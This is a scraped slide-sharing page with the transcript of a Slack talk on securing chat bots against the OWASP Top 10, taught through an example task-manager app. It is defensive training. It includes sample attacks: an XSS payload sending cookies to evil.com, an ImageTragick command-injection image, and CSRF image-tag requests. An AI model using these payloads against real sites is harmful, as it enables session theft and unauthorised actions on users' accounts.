Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfMounikaPolabathina
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 

Recently uploaded (20)

Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdf
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 

Security Best Practices for Bot Builders

  • 1.
  • 3. Questions? Comments? Tweet questions, photos or GIFs at #SlackDevTour or @SlackAPI 😁
  • 4. Hi! I’m Max Feldman Product Security @ Slack mfeldman@slack-corp.com @MrsBufferworths https://img.wonderhowto.com/img/50/81/63545703386404/0/advice-from-real-hacker-protect-yourself-from-being-hacked.1280x600.jpg
  • 5. Agenda ● Common web application vulnerabilities (OWASP Top 10) ● Designing an example bot and ○ Finding these vulnerabilities ○ Preventing these vulnerabilities ● Q&A
  • 6. Why should you care? ● Put food on the table ● A hack can be devastating to users, and in turn, to business
  • 7. Why should you care? ● Bots operating in an enterprise handle highly sensitive information ● Our customers trust us (Slack and you) to keep their data secure ● Slack conducts security reviews of App Directory apps
  • 8. Bots and Integrations ● Bot - digital user, powered by software ● Integration - linking of multiple services (e.g. a 3rd-party integrates with Slack via a slash command) ○ A bot can be part of an integration
  • 9. Web Application Security ● Bots and integrations generally rely on websites/servers ● We need to ensure the security of all components to ensure the security of our customers
  • 10. OWASP Top 10 https://www.owasp.org/index.php/Top_10_2013-Top_10 ● OWASP: Open Web Application Security Project ○ Dedicated to web security ○ Makes handy tools (more later) ● Top 10: the top 10 most critical web application vulnerabilities
  • 11. Dynamic Web Pages ● A lot of security issues result from trusting user input (as it’s run on the backend, displayed on the page, etc.) ● Modern web apps are complex - be aware of user input sources User Input
  • 12. 1. Injection ● General injection flaws (attacker code running on server) ○ SQLi, OS, others ○ Outcome = remote code execution, arbitrary file read, others ● Remote code execution ○ Attackers can run code on your server
  • 13. 1. Injection ● Remote code execution ○ E.g. Image Tragick - exploit.mvg - processing this image would result in arbitrary call being executed push graphic-context viewbox 0 0 640 480 fill ‘url(https://127.0.0.1/oops.jpg”|<arbitrary call>)’ pop graphic-context ● SQL injection ○ Untrusted user input is parsed and interpreted as SQL code ○ Database dumps, can also lead to RCE
  • 14. 2. Broken Authentication and Session Management ● Weak session tokens, values which get repeated ● No auth checks ● All sorts of diverse problems ○ Sessions not verified ○ Secrets not securely generated/long enough ● A door with no lock https://www.owasp.org/index.php/Authentication_Cheat_Sheet https://www.owasp.org/index.php/Session_Management_Cheat_Sheet
  • 15. 3. Cross-Site Scripting ● Attacker injects Javascript into a web page, which then runs in the context of that page ● User input is everywhere in dynamic web pages - if left unsanitized, the browser will interpret it as code XSS Potential
  • 16. 3. Cross-Site Scripting ● Cookies - keys to the web application ○ We (we are hackers now) want to steal them ○ Example cookie theft payload: document.write('<img src="https://evil.com/collect.gif?cookie=' + document.cookie + '" />') https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
  • 17. 4. Insecure Direct Object Reference
  • 18. 5. Security Misconfiguration ● Out-of-date software ● Unnecessary services running ● Default accounts/passwords enabled ● Debug mode, stack traces on, etc
  • 19. 6. Sensitive Data Exposure ● Not adequately protecting data ● Plaintext storage of passwords (or unsalted hashes), logging of sensitive information ● Not using HTTPS/SSL/encrypted communication
  • 20. 7. Missing Function Level Access Control ● Security which relies on the secrecy of the function itself ○ API functionality which doesn’t perform access control checks (even though the functionality is not exposed in the UI) - can be performed with just the request ○ Navigating directly to hidden pages (http://example.com/app/admin)
  • 21. 8. Cross-Site Request Forgery ● Cross-site request forgery ○ Post-authentication, user is forced to perform a state- changing request ○ The server only sees an authenticated request telling it to change state, acts accordingly ● Bank example: ○ https://bank.com/transfer?to=mom&amount=20
  • 22. 8. Cross-Site Request Forgery ● Cross-site request forgery ○ Post-authentication, user is forced to perform a state- changing request ○ The server only sees an authenticated request telling it to change state, acts accordingly ● Bank example: ○ https://bank.com/transfer?to=mom&amount=20 ● GET <img src=bank.com/transfer?to=evilAccount&amount=10000...> ● POST requests also possible
  • 23. 9. Using Components with Known Vulnerabilities ● Don’t use things that have known vulnerabilities! ● They are vulnerable
  • 24. 10. Underprotected APIs* ● API endpoints which have vulnerabilities or lack protection/prevention measures, e.g. ○ An API endpoint which doesn’t perform authentication ○ An HTTP endpoint ● Don’t assume that API endpoints will only receive requests from well-behaving users ○ Even if the APIs are for a mobile app/backend, attackers can intercept traffic * This is from the release candidate for the new OWASP Top 10 (overlaps a bit with #7)
  • 25. How to find and prevent these vulnerabilities Scenario: Building a Task Management App
  • 26. What should our task manager do? ● Integrate an existing task management service (taskbot-site.com) ● Users use a slash command to manage (create/edit/delete) and view tasks ● Users can also manage tasks from taskbot- site.com
  • 27. How do we find and prevent vulnerabilities? Don’t trust anything! Let’s walk through the OWASP Top 10 XSS, CSRF, SSL issues are what we see most often (in App Directory reviews)
  • 28. 1. Injection ● Let’s say taskbot-site.com has an API, which receives requests and then creates a Task ● E.g. POST taskbot-site.com/create task=”Don’t get hacked” ● Tasks are stored into a SQL DB ● Don’t trust user input! ● Use bind variables/paramaterized statements for SQL ● Don’t put user input in places where it may be executed
  • 29. 2. Broken Authentication and Session Management ● How does the API know who is actually creating the request? POST taskbot-site.com/create task=”Don’t get hacked” user=”Happy user” ● An attacker can modify the user parameter if we blindly trust it ● Check that sensitive actions require authorization ● Authenticate users, use best practices for session management ○ Most web app frameworks offer these capabilities ○ Burp, ZAP can find some of these issues ● Keep secrets secret! (and unguessable)
  • 30. 3. Cross-Site Scripting ● Let’s say taskbot-site.com has a web frontend for searching through your tasks ○ taskbot-site.com/search?param=”laundry” ● What if param=<malicious javascript>?
  • 31. 3. Cross-Site Scripting ● We need to look for places with user input and make sure we encode them on the page (your framework can probably do this) ○ &lt; &gt; etc. (HTML entities) ● OWASP has a cheat sheet of inputs which may trigger XSS - https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sh eet ● Don’t trust user input! ● ZAP, Burp
  • 32. 4. Insecure Direct Object Reference ● We want users to be able to view their tasks at taskbot- site.com/TaskID ● A new user signs up and creates a task, which points to taskbot- site.com/10012 ● What happens if they go to taskbot-site.com/10011? ● Make sure to check authorization for all privileged resources! ○ Most web application frameworks offer this
  • 33. 5. Security Misconfiguration ● Follow the best practices for the security of your framework ○ Disable default credentials ○ Disable verbose debugs, stack traces ● Run/provide access to only what is necessary ● Principle of least privilege - request only the permissions that you need ○ If using OAuth, request scope with minimum required capabilities (https://api.slack.com/docs/oauth-scopes)
  • 34. 6. Sensitive Data Exposure ● Use SSL/TLS! ○ But don’t use weak ciphers/protocols ○ Qualys SSL Test, sslyze to test your server ● Do people need to login to taskbot-site.com/TaskID ○ How do we store sensitive information (passwords, etc.)? ■ Plaintext = bad ■ bcrypt, PBKDF2 = good ● Be aware of how data is transmitted and stored - avoid plaintext
  • 35. 7. Missing Function Level Access Control ● taskbot-site.com/admin - how do we control access to this page? ○ Check that users are authenticated and authorized to reach this content ● Require auth for these pages ○ Be aware of what these pages are! ○ Admin pages, default pages from the framework ○ Burp and ZAP can help automate this
  • 36. 8. Cross-Site Request Forgery ● Task creation directly from taskbot-site.com GET taskbot-site.com/create?task=”Don’t get hacked” ● An attacker can create a malicious page containing this request, <html><img src=taskbot-site.com/create?task=”DO get hacked”></html> ● Check for state-changing actions, and add CSRF-prevention (a CSRF token) ● POST taskbot-site.com/create?task=”Don’t get hacked”
  • 37. 8. Cross-Site Request Forgery ● CSRF prevention done via CSRF tokens ○ Tokens not sent automatically (so an attacker can’t guess them) ○ Can be POST data or part of the header ● POST taskbot-site.com/create task=”Don’t get hacked”&csrf_token=<random> ● Most frameworks provide CSRF prevention mechanisms ● ZAP, Burp
  • 38. 9. Using Components with Known Vulnerabilities ● Nikto is a good general scanner ● Many language or framework-specific scanners as well ○ (wpscan for wordpress) ● Update and patch your systems and your software! ● For example, don’t run taskbot-site.com on Apache 1.0 on an OS from 1994
  • 39. 10. Underprotected APIs ● Suppose we want taskbot-site.com/create to be available to Slack, but we assume users won’t use it ○ If we have no protection, attackers can still find and use this API endpoint ○ Verify that requests originate from Slack (we send along a token for verification, https://api.slack.com/tutorials/your- first-slash-command) ● Check hidden/unpublished APIs as well (attackers can still access them)
  • 40. Security Development Lifecycle ● We’ve talked about specific vulnerabilities, but also be aware of the development process
  • 41. Key Takeaways ● Don’t trust user input! ○ Where is dynamic data influencing control of your application ○ Think of how an attacker might abuse your system ● Think about security from the beginning ○ Use an SDL, design securely, have a process
  • 42. Key Takeaways ● Principle of least privilege - limit the power and permissions allowed to services to bare minimum ○ Restrict OAuth scope to what’s necessary ○ Over-permissioned services are dangerous
  • 43. Q&A
  • 44. Helpful Resources OWASP Nikto ZAP, Burp WPScan Qualys SSL, SSLyze sqlmap Nmap General Slack Security Slack App Directory Security Review
  • 45. Stay in touch ● Install the Platform News App for fresh news, delivered straight to Slack ● Chat with us on Twitter @SlackAPI